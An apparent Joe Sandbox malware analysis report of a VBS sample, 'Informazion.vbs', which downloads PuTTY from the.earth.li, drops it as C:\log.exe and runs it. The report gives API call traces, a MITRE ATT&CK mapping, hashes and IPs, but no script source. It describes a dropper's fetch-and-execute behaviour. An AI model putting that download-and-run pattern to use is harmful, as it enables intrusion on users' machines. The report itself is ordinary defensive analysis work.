Source: wscript.exe, 00000000.00000002.264948145.0000023B7BDF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000002.264948145.0000023B7BDF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\log.exeCode function: 1_2_00C6413D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00C6413D
Source: C:\log.exeCode function: 1_2_00C62FF1 GetProcessHeap,1_2_00C62FF1
Source: C:\log.exeCode function: 1_2_00C5A4B2 mov ecx, dword ptr fs:[00000030h]1_2_00C5A4B2
Source: C:\log.exeCode function: 1_2_00C4E51E SetUnhandledExceptionFilter,1_2_00C4E51E
Source: C:\log.exeCode function: 1_2_00C6413D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00C6413D
Source: C:\log.exeCode function: 1_2_00C4E52A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00C4E52A

HIPS / PFW / Operating System Protection Evasion

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exeFile created: putty[1].exe.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeDomain query: the.earth.li
Source: C:\Windows\System32\wscript.exeNetwork Connect: 93.93.131.124 443Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\log.exe "C:\log.exe" Jump to behavior
Source: C:\log.exeCode function: 1_2_00BEC480 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,1_2_00BEC480
Source: C:\log.exeCode function: 1_2_00BEC620 DeleteObject,AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,1_2_00BEC620
Source: C:\log.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00C6828B
Source: C:\log.exeCode function: EnumSystemLocalesW,1_2_00C684E1
Source: C:\log.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00C6857C
Source: C:\log.exeCode function: EnumSystemLocalesW,1_2_00C687CF
Source: C:\log.exeCode function: GetLocaleInfoW,1_2_00C62787
Source: C:\log.exeCode function: GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,PeekMessageW,IsWindow,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,1_2_00BB4877
Source: C:\log.exeCode function: GetLocaleInfoW,1_2_00C6882E
Source: C:\log.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00C689F5
Source: C:\log.exeCode function: GetLocaleInfoW,1_2_00C6894E
Source: C:\log.exeCode function: EnumSystemLocalesW,1_2_00C68903
Source: C:\log.exeCode function: GetLocaleInfoW,1_2_00C68AFB
Source: C:\log.exeCode function: EnumSystemLocalesW,1_2_00C62ED5
Source: C:\log.exeCode function: 1_2_00C3E0B0 cpuid 1_2_00C3E0B0
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\log.exeCode function: 1_2_00C3EF00 ___from_strstr_to_strchr,CreateNamedPipeA,CreateEventA,GetLastError,1_2_00C3EF00
Source: C:\log.exeCode function: 1_2_00C4E3DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00C4E3DC
Source: C:\log.exeCode function: 1_2_00BECBA0 GetVersionExA,GetProcAddress,1_2_00BECBA0
Source: C:\log.exeCode function: 1_2_00C169E0 GetProcAddress,___from_strstr_to_strchr,GetUserNameA,GetUserNameA,1_2_00C169E0
Source: C:\log.exeCode function: 1_2_00BE6250 socket,SetHandleInformation,_strncpy,setsockopt,inet_addr,htonl,htonl,getaddrinfo,htons,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,1_2_00BE6250

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Command and Scripting Interpreter		Path Interception112
Process Injection		1
Masquerading		11
Input Capture		1
System Time Discovery		Remote Services11
Input Capture		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts221
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts112
Process Injection		LSASS Memory21
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over Bluetooth2
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Exploitation for Client Execution		Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Application Window Discovery		SMB/Windows Admin Shares1
Clipboard Data		Automated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)221
Scripting		NTDS1
Account Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer13
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
System Owner/User Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
Remote System Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
System Information Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Informazion.vbs5%ReversingLabs
Informazion.vbs15%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\putty[1].exe0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\putty[1].exe3%VirustotalBrowse
C:\log.exe0%ReversingLabs
C:\log.exe3%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0%URL Reputationsafe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
https://www.chiark.greenend.org.uk/~sgtatham/putty/host/:/0123456789abcdefghijklmnopqrstuvwxyzABCDEF0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
the.earth.li
93.93.131.124
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://the.earth.li/~sgtatham/putty/0.78/w32/putty.exefalse
      		high
      https://the.earth.li/~sgtatham/putty/latest/w32/putty.exefalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://the.earth.li/Uwscript.exe, 00000000.00000003.259955317.0000023B791E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0twscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
          • URL Reputation: safe
          		unknown
          https://sectigo.com/CPS0wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://www.chiark.greenend.org.uk/~sgtatham/putty/host/:/0123456789abcdefghijklmnopqrstuvwxyzABCDEFwscript.exe, 00000000.00000003.262590206.0000023B7B860000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ywscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
          • URL Reputation: safe
          		unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
          • URL Reputation: safe
          		unknown
          http://ocsp.sectigo.com0wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
          • URL Reputation: safe
          		unknown
          https://www.chiark.greenend.org.uk/~sgtatham/putty/wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262590206.0000023B7B860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BD22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260156905.0000023B7BD22000.00000004.00000020.00020000.00000000.sdmp, log.exe, log.exe, 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp, log.exe, 00000001.00000003.260463652.0000000003081000.00000004.00000020.00020000.00000000.sdmp, log.exe, 00000001.00000000.259191390.0000000000C77000.00000002.00000001.01000000.00000007.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
          • URL Reputation: safe
          		unknown
          https://the.earth.li/wscript.exe, 00000000.00000003.259955317.0000023B791E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
            • URL Reputation: safe
            		unknown
            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
            • URL Reputation: safe
            		unknown
            https://www.chiark.greenend.org.uk/~sgtatham/putty/0wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            93.93.131.124
            		the.earth.liUnited Kingdom
            		44684MYTHICMythicBeastsLtdGBfalse

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:783911
            Start date and time:2023-01-13 16:03:36 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 10m 47s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:Informazion.vbs
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:16
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal76.evad.winVBS@3/2@1/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 0.1% (good quality ratio 0.1%)
            • Quality average: 88%
            • Quality standard deviation: 0%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 18
            • Number of non-executed functions: 193
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Override analysis time to 240s for JS/VBS files not yet terminated

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            93.93.131.124doc.docGet hashmaliciousBrowse
            • the.earth.li/~sgtatham/putty/latest/w64/putty.exe
            lmfao.docGet hashmaliciousBrowse
            • the.earth.li/~sgtatham/putty/0.63/x86/pscp.exe

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            the.earth.li827837hj.xlsGet hashmaliciousBrowse
            • 93.93.131.124
            doc.docGet hashmaliciousBrowse
            • 93.93.131.124
            https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msiGet hashmaliciousBrowse
            • 93.93.131.124
            1mixELaybY.exeGet hashmaliciousBrowse
            • 93.93.131.124
            smphost.dllGet hashmaliciousBrowse
            • 93.93.131.124
            #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousBrowse
            • 93.93.131.124
            #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousBrowse
            • 93.93.131.124
            #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousBrowse
            • 93.93.131.124
            Microsoft Excel.xlsmGet hashmaliciousBrowse
            • 93.93.131.124
            Microsoft Excel.xlsmGet hashmaliciousBrowse
            • 93.93.131.124
            lmfao.docGet hashmaliciousBrowse
            • 93.93.131.124
            YOeg64zDX4.exeGet hashmaliciousBrowse
            • 93.93.131.124
            payload.exeGet hashmaliciousBrowse
            • 93.93.131.124
            do7ZLDDsHX.xlsGet hashmaliciousBrowse
            • 93.93.131.124
            https://e.coka.la/V42OO5.htaGet hashmaliciousBrowse
            • 46.43.34.31
            https://e.coka.la/V42OO5.htaGet hashmaliciousBrowse
            • 46.43.34.31
            Moving_list_of_the_day.xlsxGet hashmaliciousBrowse
            • 46.43.34.31
            m.docGet hashmaliciousBrowse
            • 46.43.34.31
            m.docGet hashmaliciousBrowse
            • 46.43.34.31
            m.docGet hashmaliciousBrowse
            • 46.43.34.31

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            MYTHICMythicBeastsLtdGB827837hj.xlsGet hashmaliciousBrowse
            • 93.93.131.124
            7XlWWSA2LU.dllGet hashmaliciousBrowse
            • 93.93.132.33
            section_228_highways_agreement 34377.jsGet hashmaliciousBrowse
            • 46.235.226.209
            dfas_telework_agreement 20731.jsGet hashmaliciousBrowse
            • 46.235.226.209
            private_child_support_agreement_template 17845.jsGet hashmaliciousBrowse
            • 46.235.226.209
            making_a_contract_legally_binding_30040.jsGet hashmaliciousBrowse
            • 46.235.226.209
            illegalargumentexception_comparison_method_violates_its_general_contra 70051.jsGet hashmaliciousBrowse
            • 46.235.226.209
            electrical_contractor_agreement_template 5445.jsGet hashmaliciousBrowse
            • 46.235.226.209
            gootloader_stage1.jsGet hashmaliciousBrowse
            • 46.235.226.209
            difference_between_service_contract_and_employment_contract 98116.jsGet hashmaliciousBrowse
            • 46.235.226.209
            print_scheduling_agreement_sap 4874.jsGet hashmaliciousBrowse
            • 46.235.226.209
            chase_heloc_subordination_form 86327.jsGet hashmaliciousBrowse
            • 46.235.226.209
            doc.docGet hashmaliciousBrowse
            • 93.93.131.124
            https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msiGet hashmaliciousBrowse
            • 93.93.131.124
            1mixELaybY.exeGet hashmaliciousBrowse
            • 93.93.131.124
            smphost.dllGet hashmaliciousBrowse
            • 93.93.131.124
            arm7Get hashmaliciousBrowse
            • 46.235.224.242
            #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousBrowse
            • 93.93.131.124
            #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousBrowse
            • 93.93.131.124
            #U043a#U043d#U043e#U043f#U043a#U0430.xlsmGet hashmaliciousBrowse
            • 93.93.131.124

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            37f463bf4616ecd445d4a1937da06e19c6lofiX9CB.exeGet hashmaliciousBrowse
            • 93.93.131.124
            INVOICE.shtmlGet hashmaliciousBrowse
            • 93.93.131.124
            file.exeGet hashmaliciousBrowse
            • 93.93.131.124
            file.exeGet hashmaliciousBrowse
            • 93.93.131.124
            IMAGEDDOC0559DOC030273YALUMINUMPROFIL3554EQUANTITIES9.exeGet hashmaliciousBrowse
            • 93.93.131.124
            o6HgKqZ6O4.exeGet hashmaliciousBrowse
            • 93.93.131.124
            o6HgKqZ6O4.exeGet hashmaliciousBrowse
            • 93.93.131.124
            https://www.evernote.com/shard/s638/sh/426379c4-3630-2a90-2fcd-ff0edc41176c/ef2ff11884d7981e2483e5e0b6bc4d76Get hashmaliciousBrowse
            • 93.93.131.124
            INV_bOWs0092583987212x7oWtBngSjmXGhfxnGmdRTFYwfAAaqgdz5s91VH0NPph17OPT3.HTMGet hashmaliciousBrowse
            • 93.93.131.124
            TinaWalter_Documents.docx.docGet hashmaliciousBrowse
            • 93.93.131.124
            loding32x.xllGet hashmaliciousBrowse
            • 93.93.131.124
            new order.exeGet hashmaliciousBrowse
            • 93.93.131.124
            https://chip-pk.org/382126857475998767112480fixed156828615392ibmxgen-pagex-ifetchxfernando.luzisecuredxtalkdesk.comsafe-1Get hashmaliciousBrowse
            • 93.93.131.124
            Version.109.3662.14.jsGet hashmaliciousBrowse
            • 93.93.131.124
            https://wp.zrobleno.de/nexxo.phpGet hashmaliciousBrowse
            • 93.93.131.124
            https://d135ng9fv6otu1.cloudfront.net/?number=050-5539-4998&dc=AthbjGzyVI2Qh2Drk5wgiXO51pRTXx1Y1673600854Get hashmaliciousBrowse
            • 93.93.131.124
            image0010_CamScanner.exeGet hashmaliciousBrowse
            • 93.93.131.124
            Spec_CamScanner.exeGet hashmaliciousBrowse
            • 93.93.131.124
            BOQ_CamScanner_0089005.exeGet hashmaliciousBrowse
            • 93.93.131.124
            Fact63c12.msiGet hashmaliciousBrowse
            • 93.93.131.124

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\putty[1].exe827837hj.xlsGet hashmaliciousBrowse
              C:\log.exe827837hj.xlsGet hashmaliciousBrowse

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\putty[1].exe

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):1477416
                Entropy (8bit):7.105848296111733
                Encrypted:false
                SSDEEP:24576:OTyfiD4jBr22smnkqnYvx5IOPQA4joBYd6YTekB7N5qu2Bcjf59SD/Dv:D68bxSQApsRekBeZm8
                MD5:AEB47B393079D8C92169F1EF88DD5696
                SHA1:633602BAE798867894494717268CA818F923CA18
                SHA-256:D83494CFB155056118365455F5396401E97BD50A156242F2B5025A44C67095B1
                SHA-512:7ED48D1BF7E514A736A34842A5A3ED18ADE06A304B45C0520BD15C53CB95A8BF997C073030A88C1133C7DF6E5AD08F44FE1A89EE90C79499E6FD54CE3FCD1BA0
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                • Antivirus: Virustotal, Detection: 3%, Browse
                Joe Sandbox View:
                • Filename: 827837hj.xls, Detection: malicious, Browse
                Reputation:low
                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....\c.................R..........6.............@..................................)....@.................................X...........X............4..(W... ..\...................................................\...P............................text....Q.......R.................. ..`.rdata.......p.......V..............@..@.data....@..........................@....00cfg.......P......................@..@.tls.........`......................@....voltbl......p...........................rsrc...X...........................@..@.reloc..\.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                C:\log.exe

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):1477416
                Entropy (8bit):7.105848296111733
                Encrypted:false
                SSDEEP:24576:OTyfiD4jBr22smnkqnYvx5IOPQA4joBYd6YTekB7N5qu2Bcjf59SD/Dv:D68bxSQApsRekBeZm8
                MD5:AEB47B393079D8C92169F1EF88DD5696
                SHA1:633602BAE798867894494717268CA818F923CA18
                SHA-256:D83494CFB155056118365455F5396401E97BD50A156242F2B5025A44C67095B1
                SHA-512:7ED48D1BF7E514A736A34842A5A3ED18ADE06A304B45C0520BD15C53CB95A8BF997C073030A88C1133C7DF6E5AD08F44FE1A89EE90C79499E6FD54CE3FCD1BA0
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                • Antivirus: Virustotal, Detection: 3%, Browse
                Joe Sandbox View:
                • Filename: 827837hj.xls, Detection: malicious, Browse
                Reputation:low
                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....\c.................R..........6.............@..................................)....@.................................X...........X............4..(W... ..\...................................................\...P............................text....Q.......R.................. ..`.rdata.......p.......V..............@..@.data....@..........................@....00cfg.......P......................@..@.tls.........`......................@....voltbl......p...........................rsrc...X...........................@..@.reloc..\.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:assembler source, ASCII text, with CRLF line terminators
                Entropy (8bit):5.091208463743103
                TrID:
